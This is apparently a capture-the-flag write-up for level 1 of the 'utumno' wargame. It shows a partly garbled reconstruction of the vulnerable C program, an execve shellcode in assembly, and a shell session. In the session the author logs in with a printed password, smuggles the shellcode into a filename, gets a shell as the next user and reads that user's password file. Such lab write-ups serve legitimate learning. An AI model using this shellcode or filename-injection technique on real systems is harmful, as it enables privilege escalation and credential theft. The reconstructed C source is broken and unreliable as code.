utumno - 1

/* utumno1.c */

#include <stdio.h>
#include <stdlib.h>

/** stack environment of main
*	env
*	argv
*	argc
*	eip
*	ebp
*	align
*	stack of main
*/

/** stack environment of run
*	filename + 3
*		<== ebp + 0x08
*	eip
*		<== ebp + 0x04
*	ebp
*		<== ebp
*	xxx
*		<== ebp - 0x04
*/
void run(char *filename)
{
push   %ebp
mov    %esp,%ebp
sub    $0x10,%esp
lea    -0x4(%ebp),%eax
add    $0x8,%eax
mov    %eax,-0x4(%ebp)
mov    -0x4(%ebp),%eax
mov    0x8(%ebp),%edx
mov    %edx,(%eax)
leave
ret
}

int main(int argc, char *argv[])
{
if (argv[1] == NULL)
exit(1);

DIR dirp = opendir(argv[1]);
if (dirp == NULL)
exit(1);

struct dirent *direntp;
while ((direntp = readdir(dirp)) != NULL) {
if (strncmp("sh_", direntp->name, 3) == NULL) {
run(direntp->name + 3);
}
}
}

; nasm -f elf64 shellcode.asm -g -F stabs -o shellcode.o
; for i in $(objdump -d shellcode.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
;

BITS 32

global _start
section .text

; syscalls kernel
SYS_EXECVE equ 0x0b

_start:
; ln -sf /bin/sh UUUU
; execve("UUUU", 0, 0);
push SYS_EXECVE ; SYS_EXECVE = 11
pop eax         ; set SYS_EXECVE to eax

xor esi, esi    ; clean esi
push esi        ; esi is zero
push 0x55555555 ; push 'UUUU'

; execve("UUUU", 0, 0);
;             ^
;             |
;            ebx
mov ebx, esp

; execve("UUUU", 0, 0);
;                     ^
;                     |
;                    ecx
xor ecx, ecx    ; clean ecx

; execve("UUUU", 0, 0);
;                        ^
;                        |
;                       edx
mov edx, ecx    ; set zero to edx
int 0x80        ; syscall execve

root@today:~/Desktop/misc/utumno/utumno1# ssh utumno1@178.79.134.250

utumno1@178.79.134.250's password: aathaeyiew

utumno1@melinda:~$ cd /tmp

utumno1@melinda:/tmp$ mkdir utu1

utumno1@melinda:/tmp$ cd utu1

utumno1@melinda:/tmp/utu1$ mkdir dir

utumno1@melinda:/tmp/utu1$ ls
dir

utumno1@melinda:/tmp/utu1$ cd dir

utumno1@melinda:/tmp/utu1/dir$ touch `python -c 'print "sh_\x6a\x0b\x58\x31\xf6\x56\x68\x55\x55\x55\x55\x89\xe3\x31\xc9\x89\xca\xcd\x80"'`

utumno1@melinda:/tmp/utu1/dir$ cd ..

utumno1@melinda:/tmp/utu1$ ln -sf /bin/sh UUUU

utumno1@melinda:/tmp/utu1$ /utumno/utumno1 dir
$ whoami
utumno2
$ cat /etc/utumno_pass/utumno2
ceewaceiph
$